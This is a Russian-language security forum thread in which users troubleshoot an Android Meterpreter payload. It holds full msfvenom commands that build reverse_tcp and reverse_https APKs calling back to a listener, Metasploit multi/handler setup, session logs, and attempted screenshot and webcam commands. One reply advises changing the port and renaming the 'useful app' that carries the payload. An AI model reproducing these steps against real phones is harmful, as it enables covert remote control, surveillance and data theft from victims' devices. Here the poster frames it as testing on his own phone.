• Твой профиль заполнен на 0%. Заполни за 1 минуту, чтобы тебя нашли единомышленники и работодатели. Заполнить →

Проблема Получение meterpreter - сессии на Andriod

vunya

Green Team
03.10.2017
30
8
Добрый день !
Не могу понять по какой причине рвется сессия, открытая на андроид-смарте.

Сгенерирован пэйлоад:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk

Его забросил на свой девайс.
Заупскаю Мультихэндлер, запускаю арк на смарте и получаю вот такое:

msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.104:4444
[*] Sending stage (70031 bytes) to 192.168.1.103
[*] Sleeping before handling stage...
[*] Meterpreter session 16 opened (192.168.1.104:4444 -> 192.168.1.103:47010) at 2018-04-02 17:08:57 +0300
[*] 192.168.1.103 - Meterpreter session 16 closed. Reason: Died

Опции:
Payload options (android/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.104 yes The listen address
LPORT 4444 yes The listen port
 
reverse_https стоит попробовать
 
  • Нравится
Реакции: vunya
благодарю
получилось получить сессию, правда какаую-то странную :)
ни одна команда не выполняется

meterpreter > screenshot
[-] Error running command screenshot: Rex::TimeoutError Operation timed out.
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > ifconfig
[-] Error running command ifconfig: Rex::TimeoutError Operation timed out.
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter >
 
1) msfvenom -p android/meterpreter/reverse_https LHOST=192.168.1.104 LPORT=4444 -a dalvik --platform android -o /root/xiaomi/abc.apk
2)msf exploit(multi/handler) >
set payload android/meterpreter/reverse_https
set lport 4444
set lhost
run
3) Порт указать который ранее не использовался, если все время долбили 4444,ставим 6789 и название меняем у полезного приложения.
 
  • Нравится
Реакции: Vertigo
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab